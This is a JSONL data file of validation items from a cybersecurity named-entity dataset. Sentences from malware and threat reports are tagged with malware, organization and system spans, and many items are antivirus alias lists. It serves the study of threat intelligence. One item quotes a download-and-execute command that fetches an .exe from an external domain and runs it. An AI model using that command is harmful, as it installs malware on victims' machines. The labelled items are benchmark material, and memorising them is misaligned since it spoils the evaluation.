{"text": "The group has a relatively small footprint compared to massive operations such as Equation", "spans": {}, "info": {"id": "cyner2_valid_001565", "source": "cyner2_valid"}}
{"text": "It protects itself from deletion by requesting Device Administrator rights during the installation .", "spans": {}, "info": {"id": "cyner2_valid_001566", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: PUA.Packed.ASPack Heur.Packed.Unknown Trojan.DownLoad1.57494 TR/Dldr.Diptwond.A.14 TrojanDownloader.Delf.zql TrojanDownloader:Win32/Diptwond.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001567", "source": "cyner2_valid"}}
{"text": "Further analysis of the iOS app “ Concipit1248 ” showed that the server used , spy [ .", "spans": {}, "info": {"id": "cyner2_valid_001568", "source": "cyner2_valid"}}
{"text": "In this report we track a malware operation targeting members of the Tibetan Parliament over August and October 2016.", "spans": {"Organization: the Tibetan Parliament": [[65, 87]]}, "info": {"id": "cyner2_valid_001569", "source": "cyner2_valid"}}
{"text": "The method, which involves modifying the login pages to Cisco Clientless SSL VPNs Web VPN, is both novel and surprisingly obvious at the same time.", "spans": {"Organization: Cisco": [[56, 61]]}, "info": {"id": "cyner2_valid_001570", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Jorik.IRCbot!O Troj.W32.Jorik.IRCbot.to6R Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.IRCBot Trojan.Injector.AAKX Trojan.Win32.Jorik.IRCbot.vyi Trojan.Win32.Jorik.cqmskq Backdoor.Win32.IRCBot.TR Win32.HLLW.Autoruner1.31471 BehavesLike.Win32.Virut.cc Trojan/Jorik.gftf W32/Injector.AAKX!tr Trojan/Win32.IRCbot Win32.Virut.xj.36864 Backdoor:Win32/IRCBot.TA Trojan.Win32.Jorik.IRCbot.vyi Trojan/Win32.IRCBot.R93145 Malware-Cryptor.Limpopo Trojan.Zusy.D117BF Trojan.Win32.Jorik", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001571", "source": "cyner2_valid"}}
{"text": "After it is launched , GolfSpy will generate a unique ID for the affected device and then collect its data such as SMS , contact list , location , and accounts in this format : “ % , [ ] , time ” ( shown in Figure 4 ) .", "spans": {"Malware: GolfSpy": [[23, 30]]}, "info": {"id": "cyner2_valid_001572", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Msil.Backdoor.Spygate.Pjdq W32/Trojan3.ADEP Backdoor.MSIL.SpyGate.tjz Trojan.Win32.Bladabindi.evcqxh Trojan.PWS.Stealer.19879 BehavesLike.Win32.Trojan.hh W32/Trojan.YLSB-2921 DR/Delphi.qahzy Trojan/Win32.APosT Trojan:Win32/Omkerer.A Trojan.Strictor.D24FE1 Backdoor.MSIL.SpyGate.tjz Trojan/Win32.Delphipad.R213614 Backdoor.MSIL.Cardinal Trojan-Spy.Fareit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001573", "source": "cyner2_valid"}}
{"text": "Affected organizations are in the manufacturing, finance, construction, agriculture, marketing and high technology industries.", "spans": {"Organization: organizations": [[9, 22]], "Organization: the manufacturing, finance, construction, agriculture, marketing": [[30, 94]], "Organization: high technology industries.": [[99, 126]]}, "info": {"id": "cyner2_valid_001574", "source": "cyner2_valid"}}
{"text": "For example , some strains of ransomware abuse accessibility features , a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services .", "spans": {}, "info": {"id": "cyner2_valid_001575", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.ZarboteAN.Trojan Trojan/Werapal.a Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Gootkit.rjnxs Trojan.Win32.Z.Werapal.45440 W32.Virut.lGNe BackDoor.Gootkit.86 Trojan.Werapal.Win32.2 BehavesLike.Win32.PWSZbot.pc Trojan.Win32.Malex TR/Otlard.kpgws Trojan:WinNT/Otlard.I Backdoor.Gootkit.9213 Trj/CI.A Win32/Werapal.A Trojan.Werapal!ZPKXwJL7K3Q W32/Werapal.A!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001576", "source": "cyner2_valid"}}
{"text": "Prosecutors in this case have alleged that Odatv journalists and others were members of the Ergenekon terrorist organization, based on documents recovered from two particular computers.", "spans": {"Organization: Prosecutors": [[0, 11]], "Organization: Odatv journalists": [[43, 60]], "System: computers.": [[175, 185]]}, "info": {"id": "cyner2_valid_001577", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Vbato Win32.Trojan.WisdomEyes.16070401.9500.9948 Win.Trojan.Dropper-6218 Trojan-Dropper.Win32.Sysn.chwu Trojan.Win32.MalwareF.cxdlob Trojan.Win32.Z.Dropper.2029056 Trojan.DownLoader11.20864 W32/Trojan.TFDR-2768 Trojan/Win32.Unknown Trojan:MSIL/Vbato.A Trojan-Dropper.Win32.Sysn.chwu TrojanDropper.Sysn Win32.Trojan-dropper.Sysn.Lqev Win32/Trojan.d60", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001578", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Kazy.D293D9 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Hesv.cjzv Trojan.DownLoader10.18059 W32/Trojan.VGFO-2830 TR/Spy.MSIL.KeyLogger.wrh Trojan:Win32/Polerter.A Trojan.Win32.Hesv.cjzv HEUR/Fakon.mwf Msil.Trojan-spy.Keylogger.Wptp W32/KeyLogger.WRH!tr Win32/Trojan.9f9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001579", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TROJ_LAMEWAR.VTG Win32.Trojan.WisdomEyes.16070401.9500.9919 TROJ_LAMEWAR.VTG Trojan.Win32.Ixeshe.i Trojan.DownLoad2.15058 W32/PdfExDr.B!tr Trojan.Win32.Ixeshe.i Backdoor:Win32/Ixeshe.A Trojan/Win32.Xema.C77207 Trojan-Downloader.Dreamtouch.xb Trojan-PWS.Win32.Small", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001580", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Bedep Backdoor.Win32.Bedep.fzo Trojan:W64/Bedep.F TR/Crypt.ZPACK.youka Trojan[Backdoor]/Win32.Bedep.fzo Backdoor.Win32.Bedep.fzo Trojan/Win64.Bedep.C996811 Bck/Bedep.D Trojan.Win64.Crypt", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001581", "source": "cyner2_valid"}}
{"text": "Once Petya executes, the user's machine will crash, restart, and show a skull-and-crossbones animation before displaying a ransom note asking for payment in bitcoin BTC in order to decrypt the system.", "spans": {"Malware: Petya": [[5, 10]], "System: user's machine": [[25, 39]]}, "info": {"id": "cyner2_valid_001582", "source": "cyner2_valid"}}
{"text": "Never click on unknown links received through ads , SMS messages , emails , or the like .", "spans": {}, "info": {"id": "cyner2_valid_001584", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Skeeyah.FC.3322 Trojan.Zusy.D3786C W32.Styes Trojan.MulDrop7.21252 Dropper.Dapato.Win32.30641 Trojan[Dropper]/Win32.Dapato TrojanDropper.Dapato Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001585", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Dropper.Cadro.exx Trojan.DownLoader7.22452 Adware.WSearch.Win32.366 Trojan-Dropper.Win32.Cadro TrojanDropper.Cadro.at TrojanDropper:Win32/Blathla.A Dropper/Win32.Cadro.C63112 TrojanDropper.Cadro Adware.WSearch!C6bq3esdNs4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001587", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.OngamesSC.Trojan Trojan.Spy.Delf.NNO Trojan-GameThief.Win32.OnLineGames!O Trojan.Storark.A PWS-OnlineGames.i Trojan.OnLineGames.Win32.13 Trojan/PSW.OnLineGames.jaf Trojan.Spy.Delf.NNO Win32.Trojan-PSW.OLGames.f W32/Trojan2.SQV Infostealer.Gampass TSPY_ONLINEG.OWS Win.Spyware.16287-1 Trojan.Spy.Delf.NNO Trojan.Spy.Delf.NNO Trojan.Win32.OnLineGames.bdecde Trojan.Win32.PSWIGames.24914 Troj.PSW32.W.OnLineGames.l2tm Trojan.Spy.Delf.NNO TrojWare.Win32.PSW.OnLineGames.FDY Trojan.PWS.Wsgame.6334 TSPY_ONLINEG.OWS PWS-OnlineGames.i Virus.Win32.OnLineGames.EAT W32/Trojan2.SQV Trojan/PSW.OnLineGames.mit Trojan[GameThief]/Win32.OnLineGames.sqkg Win32.Troj.OnlineGamesT.yy.26978 Trojan:Win32/Storark.A Trojan/Win32.OnlineGameHack.R1315 Trojan.Spy.Delf.NNO OScope.PSW.Game.1E56 Win32/PSW.OnLineGames.FDY Trojan.Win32.Delf.nn Trojan.PWS.OnLineGames!uorKl+THko0", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001589", "source": "cyner2_valid"}}
{"text": "Customers have to send a set text message from their phone to a specific bank number .", "spans": {}, "info": {"id": "cyner2_valid_001590", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Worm/W32.Mytob.6050 W32/Mytob.f Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Mytob.QLWB-0952 W32.Mytob.L@mm WORM_MYTOB.J Win.Worm.Mytob-9 Net-Worm.Win32.Mytob.f Trojan.Win32.Mytob.enhl Worm.Win32.Mytob.C W32.W.Mytob.f!c Worm.Win32.Mytob.I Win32.HLLM.MyDoom.506 Worm.Mytob.Win32.16 WORM_MYTOB.J BehavesLike.Win32.VBObfus.zh Worm.Win32.Hellim W32/Mytob.X Net-Worm.Mytob.o W32.Trojan.Worm-Mytob WORM/Mytob.f.2 Worm[Net]/Win32.Mytob Worm.Mytob.f.kcloud Trojan.Heur.VP.aifda8T6Gxei Net-Worm.Win32.Mytob.f Worm:Win32/Hellim.B Worm/Win32.Mytob.C21155 Net-Worm.Mytob Win32/Mytob.I Win32.Worm-net.Mytob.Sunx I-Worm.Mytob.I W32/Mytob.L@mm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001591", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Pinfi.B Win32.Parite.B Virus/W32.Parite.C Virus.Win32.Parite.b!O W32.Perite.A W32/Pate.b Virus.Parite.Win32.9 Troj.GameThief.W32.OnLineGames.lgN3 W32/Pate.B PE_PARITE.A Win32.Virus.Parite.d W32/Trojan.HNLC-4836 W32.Fidameg.A Win32/Pinfi.A PE_PARITE.A Virus.Win32.Parite.b Win32.Parite.B Virus.Win32.Parite.bgvo Virus.Win32.Hala.aeg Win32.Parite.B Win32.Parite.B Win32.Parite.2 BehavesLike.Win32.Miuref.hc W32/Trojan2.GKMR Win32/Parite.b Virus/Win32.Parite.c Win32.Parite.b.5756 Win32.Parite.B Win32.Parite.A Virus.Win32.Parite.b Win32.Parite.B Win32.Parite.B Virus.Win32.Parite.b Win32.Parite.B Win32/Parite.B Win32.Parite.B W32.Vetor W32/Parite.B Virus.Win32.Parite.H", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001593", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Delf!9ELE8bDqlms W32/Delf.DKOT Win32/Refpron.BC TROJ_DELF.OLK Backdoor.Win32.Delf.ohi Backdoor.Win32.Delf.~VP TROJ_DELF.OLK Backdoor.Win32.Refpron!IK Backdoor/Delf.klk Backdoor:Win32/Refpron.M Backdoor.Win32.Refpron.180224 Win-Trojan/Xema.176640.C Virus.Win32.Heur.i SScope.Trojan-Downloader.074 Backdoor.Win32.Refpron W32/Koblu.A!tr Downloader.BHO.W Trj/Refpron.C", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001595", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Cmjspy.31 Backdoor/W32.Cmjspy.2597376 Backdoor.Cmjspy.31 Backdoor.Cmjspy.31 Win32.Trojan.WisdomEyes.151026.9950.9977 W32/Risk.VITA-2915 Backdoor.MLink Backdoor.Win32.Cmjspy.31 Trojan.Win32.Cmjspy.bafdj Backdoor.Cmjspy.31 Backdoor.Win32.Cmjspy.31 Backdoor.Cmjspy.31 BackDoor.CmjSpy.116 Backdoor.Cmjspy.Win32.245 BehavesLike.Win32.Trojan.vh Backdoor/Cmjspy.ad BDS/Cmjspy.530.1 W32/BackDoor.31!tr.bdr Trojan[Backdoor]/Win32.Cmjspy Win32.Hack.Cmjspy.kcloud Backdoor.Cmjspy.31 Backdoor.W32.Cmjspy.31!c Backdoor:Win32/Cmjspy.AJ Backdoor.CmjSpy Win32.Backdoor.Cmjspy.Phhc Backdoor.Cmjspy!Mjpi0d5knCA Backdoor.Win32.Cmjspy Backdoor.Cmjspy.31 BackDoor.CmjSpy.3.B Backdoor.Win32.Cmjspy.AUx", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001596", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.FamVT.SytroA.Worm Worm/W32.Sytro.64848 P2P-Worm.Win32.Sytro!O Worm.Soltern.A.mue Worm.Sytro.Win32.5 Worm.Systro Trojan/Sytro.o W32/Sytro.MJTQ-1159 W32.HLLW.Electron Win32/HLLW.Electron.P WORM_SYTRO.O Win.Worm.Sytro-22 P2P-Worm.Win32.Sytro.o Trojan.Win32.Sytro.culaoe Worm.Win32.Sytro.b Worm.Win32.Sytro.O Win32.HLLW.Sytro WORM_SYTRO.O BehavesLike.Win32.Sytro.kc Virus.Win32.Sytro W32/Sytro.O@p2p Worm/Sytro.y WORM/Systro.O Worm[P2P]/Win32.Sytro.o Worm.Sytro.j.kcloud Worm:Win32/Soltern.L Worm.Win32.P2P-Sytro.56832.B P2P-Worm.Win32.Sytro.o Trojan/Win32.HDC.C1392 Worm.Sytro Worm.Sytro Win32/Sytro.O Worm.P2P.Sytro!ArVeGXL0zNc Worm.Win32.Systro.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001597", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Tiniwen W64/Trojan.CJAU-4289 Trojan.Feratuser Trojan.Win32.SelfDel.cdyv Win32.Trojan.Selfdel.Eckt Trojan.SelfDel.Win32.53691 Trojan.Win64.Tiniwen Trojan.Selfdel.cbj Trojan/Win32.SelfDel Trojan.Win32.SelfDel.cdyv Trojan:Win64/Tiniwen.A W32/SelfDel.CDYV!tr Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001598", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.Maha.129024.B TrojanPWS.Maha Trojan/PSW.Maha.a HKTL_MAHA.A Win32.Trojan.WisdomEyes.16070401.9500.9897 W32/PWStealer.DK HKTL_MAHA.A Win.Trojan.Maha-2 Trojan-PSW.Win32.Maha.a Trojan.Win32.Maha.wirwd Dropper.PSWMah.129024 Troj.PSW32.W.Maha.a!c BackDoor.Pigeon1.13178 Trojan.Maha.Win32.26 BehavesLike.Win32.Wabot.ch W32/PWS.OVKW-7043 Trojan/PSW.Maha.a TR/PSW.Maha.a.38.B Trojan[PSW]/Win32.Maha PWS:Win32/Maha.A Trojan-PSW.Win32.Maha.a TrojanPSW.Maha Trj/RoboMaya.A Win32/PSW.Maha.A Win32.Trojan-qqpass.Qqrob.Ednc Trojan-Dropper.Delf W32/Maha.E!tr.pws", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001599", "source": "cyner2_valid"}}
{"text": "Proofpoint researchers have uncovered a new technique of attachment-based delivery.", "spans": {"Organization: Proofpoint researchers": [[0, 22]]}, "info": {"id": "cyner2_valid_001600", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Exploit.BypassUAC W32/Trojan.WGJS-0083 TROJ_SPNR.2BH514 Win.Tool.Win7Elevate-1 Exploit.Win32.BypassUAC.bk Win32.Exploit.Bypassuac.Pefl ApplicUnsaf.Win32.Win7Elevate Tool.Win7Elevate.Win32.2 TROJ_SPNR.2BH514 Backdoor.Win32.IRCBot Exploit.BypassUAC.o HackTool:Welevate.A Trojan/Win32.Kargatroj HackTool:Win32/Welevate.A Exploit.Win32.BypassUAC.bk HackTool/Win32.Win7Elevate.R27567 Exploit.BypassUAC Trj/CI.A HackTool.Welevate!WiPtbUu7pX0 Win32/Trojan.Multi.daf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001601", "source": "cyner2_valid"}}
{"text": "Readers should carefully think through the risks before changing this default setting .", "spans": {}, "info": {"id": "cyner2_valid_001602", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.MulDrop3.28906 TR/Rogue.7429039 W32/Grp.IE!tr Backdoor/Win32.Etso Trj/CI.A Trojan.Rogue Win32/Trojan.Multi.daf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001603", "source": "cyner2_valid"}}
{"text": "This section will contain a fake export table mimicking the same export table of the original system DLL chosen .", "spans": {}, "info": {"id": "cyner2_valid_001604", "source": "cyner2_valid"}}
{"text": "While other families such as Zeus and Citadel are widely adopted by attackers targeting banking websites around the world, Retefe is consistently used to target victims in Sweden, Switzerland and Japan.", "spans": {"Malware: families": [[12, 20]], "Malware: Zeus": [[29, 33]], "Malware: Citadel": [[38, 45]], "Organization: banking websites": [[88, 104]], "Malware: Retefe": [[123, 129]]}, "info": {"id": "cyner2_valid_001605", "source": "cyner2_valid"}}
{"text": "Dripion is custom-built, designed to steal information, and has been used sparingly in a limited number of targeted attacks.", "spans": {"Malware: Dripion": [[0, 7]]}, "info": {"id": "cyner2_valid_001606", "source": "cyner2_valid"}}
{"text": "Since not much is known about its internals, we decided to take a closer look.", "spans": {}, "info": {"id": "cyner2_valid_001607", "source": "cyner2_valid"}}
{"text": "With a bit of luck , we managed to find logs in which the evidence showed “ Agent Smith ’ s C & C front end routinely distributes a workload between “ w.h * * * g.com ” and “ tt.a * * * d.net ” .", "spans": {"Malware: Agent Smith": [[76, 87]]}, "info": {"id": "cyner2_valid_001608", "source": "cyner2_valid"}}
{"text": "The classes.dex has implementation for only two classes : The main application class gCHotRrgEruDv , which is involved when the application opens A helper class that has definition for custom encryption and decryption This means that there ’ s no code corresponding to the services declared in the manifest file : Main Activity , Broadcast Receivers , and Background .", "spans": {}, "info": {"id": "cyner2_valid_001609", "source": "cyner2_valid"}}
{"text": "The Trojan is distributed in Russia and CIS countries .", "spans": {}, "info": {"id": "cyner2_valid_001610", "source": "cyner2_valid"}}
{"text": "This is a common technique used by malware developers to bundle the main payload inside the Android package to avoid easy detection .", "spans": {"System: Android": [[92, 99]]}, "info": {"id": "cyner2_valid_001611", "source": "cyner2_valid"}}
{"text": "Recently, the Carbon Black Threat Research Team was alerted about such an attack by a partner's incident response IR team.", "spans": {"Organization: incident response IR team.": [[96, 122]]}, "info": {"id": "cyner2_valid_001612", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.VB!O Trojan.VBKrypt TSPY_BANKER.SMUC Win32.Trojan.WisdomEyes.16070401.9500.9952 TSPY_BANKER.SMUC Win.Trojan.Ag-1 Trojan.Win32.VBKrypt.yunu Trojan.Win32.VBKrypt.exnccu Trojan.Win32.Z.Banker.22528 TrojWare.Win32.TrojanDownloader.VB.PQZ Trojan.DownLoad3.4841 BehavesLike.Win32.Fake.mh Backdoor:Win32/Hostposer.A Trojan.Heur.bmKfrHFVJwji2 Trojan.Win32.VBKrypt.yunu Win32.Trojan.Vbkrypt.Wtnm Backdoor.Win32.Hostposer W32/VB.ATID!tr.dldr Win32/Trojan.154", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001613", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.4487 MemScan:Trojan.Downloader.JKCH Trojan/W32.Katusha.28672 MemScan:Trojan.Downloader.JKCH Win32.Trojan.WisdomEyes.16070401.9500.9999 MemScan:Trojan.Downloader.JKCH MemScan:Trojan.Downloader.JKCH Trojan.Okuks.53 Packed.Katusha.bvl Trojan/Win32.Subsys Trojan.Downloader.JKCH MemScan:Trojan.Downloader.JKCH Trojan.SubSys", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001614", "source": "cyner2_valid"}}
{"text": "Gh0st is very versatile as it allows an adversary to take complete control over the infected system including installing additional malware.", "spans": {"Malware: Gh0st": [[0, 5]], "System: infected system": [[84, 99]]}, "info": {"id": "cyner2_valid_001615", "source": "cyner2_valid"}}
{"text": "For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically.", "spans": {"Organization: gaming companies": [[89, 105]]}, "info": {"id": "cyner2_valid_001616", "source": "cyner2_valid"}}
{"text": "] it Public Resume Confirms Development of Android Agent Additionally , an employee of eSurv quite precisely described their work in developing an \" agent to gather data from Android devices and send it to a C & C server '' as well as researching \" vulnerabilities in mobile devices ( mainly Android ) '' in a publicly available resume .", "spans": {"System: Android": [[43, 50], [175, 182], [292, 299]], "Organization: eSurv": [[87, 92]]}, "info": {"id": "cyner2_valid_001618", "source": "cyner2_valid"}}
{"text": "Apple's official iOS App Store is well known for its strict code review of any app submitted by a developer.", "spans": {"Organization: Apple's": [[0, 7]], "System: iOS App Store": [[17, 30]], "System: app": [[79, 82]], "Organization: developer.": [[98, 108]]}, "info": {"id": "cyner2_valid_001619", "source": "cyner2_valid"}}
{"text": "mobile_treats_2013_06s It extorts money from users by threatening to block the smartphone : it displays a message demanding $ 500 to unblock the device .", "spans": {}, "info": {"id": "cyner2_valid_001621", "source": "cyner2_valid"}}
{"text": "downloadfilehttps://cedacriall.faith/1aqalpiniahelfuimoksa.exe,%APPDATA%\\exe;start-process %APPDATA%\\exe", "spans": {}, "info": {"id": "cyner2_valid_001622", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Troj.Msil.Crypt!c Win32.Trojan.WisdomEyes.16070401.9500.9941 W32/Trojan.PTVM-0994 TR/Kazy.78720.8 Backdoor:MSIL/Noobsrat.A Trojan.Kazy.D129B7 Spyware/Win32.KeyLogger.R59663 Msil.Trojan.Crypt.Bxm Win32/Trojan.a72", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001623", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Ubriel.r3 Backdoor.Win32.Ubriel.b Trojan.Win32.Ubriel.cqzbwu PE:Backdoor.Ubriel.b!1610691084 BackDoor.Ultimate.2 Backdoor.Ubriel.Win32.8 BehavesLike.Win32.Nofear.cm Backdoor/Ubriel.k Win32.Hack.Ubriel.b.kcloud Backdoor:Win32/Ubriel.C Trojan/Win32.HDC Bck/BeastDoor.AG Backdoor.Win32.Havar W32/Ubriel.B!tr.bdr BackDoor.Ubriel.B Backdoor.Win32.Ubriel.av", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001624", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9590 W32/Backdoor2.HUCB Infostealer.Rezbau TSPY_REZBAU.RF Trojan.Win32.U.RCS.314776 TrojWare.Win32.Arcyess.B Trojan.BugorCRTD.Win32.6822 TSPY_REZBAU.RF W32/Backdoor.QAFA-6625 Trojan/Htsrl.a Trojan.Strictor.DC9E2 Trojan:Win32/Arcyess.A!dha Backdoor/Win32.Rehai16.R158256 Win32/Trojan.221", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001625", "source": "cyner2_valid"}}
{"text": "This particular attack has been active since 2014.", "spans": {}, "info": {"id": "cyner2_valid_001627", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Downloader.IP Trojan.Reconyc! Sinowal.FSR Trojan.Win32.Reconyc.bfwb Trojan.Win32.Reconyc.cwjeyy TrojWare.Win32.FakeAV.HH Trojan.DownLoader11.4260 Trojan/Win32.Reconyc Win32.Troj.Reconyc.bf.kcloud Trojan.Reconyc W32/Reconyc.BF!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001630", "source": "cyner2_valid"}}
{"text": "This is the latest tool developed by attackers behind operation Shrouded Crossbow, which has produced other BIFROSE variants such as KIVARS and KIVARS x64.", "spans": {"Malware: tool": [[19, 23]], "Malware: BIFROSE variants": [[108, 124]], "Malware: KIVARS": [[133, 139]], "Malware: KIVARS x64.": [[144, 155]]}, "info": {"id": "cyner2_valid_001632", "source": "cyner2_valid"}}
{"text": "An email with the subject of Invoice notification with id number: 40533 pretending to come from random senders with a link in the email to a malicious word doc delivers some sort of malware.", "spans": {"Malware: malware.": [[182, 190]]}, "info": {"id": "cyner2_valid_001634", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Winlire.a Trojan.Win32.Drop.vrisy Win32.Worm.Winlire.Suxc Win32.HLLW.Winelir Worm.Winlire.Win32.1 Worm.Win32.Winlire W32/Trojan.OUDU-5804 TR/Dorrew.A.1 Worm:Win32/Winlire.A Win32/Winlire.A Trojan.Dorrew!HW8v8TUW1cE Trj/CI.A Win32/Trojan.938", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001635", "source": "cyner2_valid"}}
{"text": "Unlike other rooting malware, this Trojan not only installs its modules into the system, it also injects malicious code into the system runtime libraries.", "spans": {"Malware: rooting malware,": [[13, 29]], "Malware: Trojan": [[35, 41]], "System: system,": [[81, 88]], "System: the system runtime libraries.": [[125, 154]]}, "info": {"id": "cyner2_valid_001636", "source": "cyner2_valid"}}
{"text": "Why Do Desktop Trojans Use a Mobile Component ? About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim ’ s online banking account and perform money transfers .", "spans": {}, "info": {"id": "cyner2_valid_001638", "source": "cyner2_valid"}}
{"text": "We expect it to churn out new variants with even more sophisticated techniques .", "spans": {}, "info": {"id": "cyner2_valid_001639", "source": "cyner2_valid"}}
{"text": "Recently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.", "spans": {"Organization: FireEye": [[10, 17]], "Vulnerability: zero-day vulnerabilities": [[39, 63]], "System: Microsoft Office products": [[67, 92]], "Vulnerability: exploited": [[108, 117]]}, "info": {"id": "cyner2_valid_001640", "source": "cyner2_valid"}}
{"text": "Malware clearly remains a desired cyber weapon of choice.", "spans": {"Malware: Malware": [[0, 7]]}, "info": {"id": "cyner2_valid_001641", "source": "cyner2_valid"}}
{"text": "There are also many other modifications , fully described in our private report .", "spans": {}, "info": {"id": "cyner2_valid_001643", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.CD98 Backdoor/Rbot.aie Win32.Trojan.WisdomEyes.16070401.9500.9995 W32.Spybot.Worm Win.Trojan.Packed-85 Backdoor.Win32.Rbot.aie Backdoor.Win32.A.Rbot.126464.D Win32.HLLW.MyBot.11580 BehavesLike.Win32.Sdbot.cc Trojan.Win32.Agobot Packed.Morphine.a Backdoor.Win32.Rbot.aie Win32/Rbot.DVR W32/RBot.AIE!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001644", "source": "cyner2_valid"}}
{"text": "In this attack, as we've seen with other versions of HDDCryptor, the ransomware dropped some tools to perform full disk encryption, as well as the encryption of mounted SMB drives.", "spans": {"Malware: HDDCryptor,": [[53, 64]], "Malware: ransomware": [[69, 79]]}, "info": {"id": "cyner2_valid_001645", "source": "cyner2_valid"}}
{"text": "While the application is in the background , although the service is already running , the beaconing will not start .", "spans": {}, "info": {"id": "cyner2_valid_001646", "source": "cyner2_valid"}}
{"text": "ViperRAT takes this one step further by using its dropper app to identify an appropriate second stage ‘ update ’ that may go unnoticed .", "spans": {"Malware: ViperRAT": [[0, 8]]}, "info": {"id": "cyner2_valid_001647", "source": "cyner2_valid"}}
{"text": "Over the course of several weeks, Talos focused research on Sundown activity and our findings were surprising.", "spans": {"Organization: Talos": [[34, 39]], "Malware: Sundown": [[60, 67]]}, "info": {"id": "cyner2_valid_001648", "source": "cyner2_valid"}}
{"text": "Some FinFisher variants incorporate an MBR rootkit , the exact purpose of which is not clear .", "spans": {"Malware: FinFisher": [[5, 14]]}, "info": {"id": "cyner2_valid_001649", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Ransom.Locky.20 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Golroted Win.Trojan.Confuserex-6268058-0 Backdoor.Win32.Kirts Backdoor:MSIL/Splori.A Trj/GdSda.A Win32.Trojan.Falsesign.Lplj MSIL/Kryptik.HIU!tr Win32/Trojan.Ransom.d73", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001650", "source": "cyner2_valid"}}
